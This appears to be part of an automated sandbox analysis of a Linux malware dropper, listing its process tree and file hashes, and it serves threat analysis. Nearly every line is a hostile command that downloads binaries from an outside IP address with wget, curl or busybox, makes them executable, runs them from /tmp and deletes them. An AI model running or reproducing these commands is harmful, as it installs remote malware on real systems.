/usr/bin/wgetwget http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:936
-
-
/bin/chmodchmod 777 MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel./MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:942
-
-
/bin/chmodchmod 777 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1./37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:948
-
-
/bin/chmodchmod 777 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2./6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:954
-
-
/bin/chmodchmod 777 asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75./asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:960
-
-
/bin/chmodchmod 777 CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD./CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:966
-
-
/bin/chmodchmod 777 c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ./c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:972
-
-
/bin/chmodchmod 777 dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR./dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:975
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97